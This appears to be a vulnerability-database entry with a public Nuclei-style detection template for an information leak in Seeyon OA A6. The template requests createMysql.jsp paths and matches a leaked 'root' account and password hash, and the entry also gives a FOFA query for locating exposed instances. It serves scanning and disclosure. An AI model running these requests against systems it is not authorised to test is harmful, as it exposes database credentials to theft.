seeyon-createmysql-exposure: Seeyon OA A6 createMysql.jsp Database - Information Disclosure

日期: 2025-08-01 | 影响软件: Seeyon OA A6 | POC: 已公开

漏洞描述

Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.

PoC代码[已公开]

id: seeyon-createmysql-exposure

info:
  name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="致远A8+协同管理软件.A6"
  tags: seeyon,oa,info-leak,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/createMysql.jsp"
      - "{{BaseURL}}/yyoa/ext/createMysql.jsp"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root</br>"

      - type: regex
        part: body
        regex:
          - "[*][0-zA-Z]{40}</br>"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210094034a1562c003d7ab94bbfcca0be096932ae8e83e3efb8eeace32626ede4c3f0221009df16229867d44ef934a18171978072cf27d2c5b861e961f4e4306f54e26f0ca:922c64590222798bb761d5b6d8e72950

相关漏洞推荐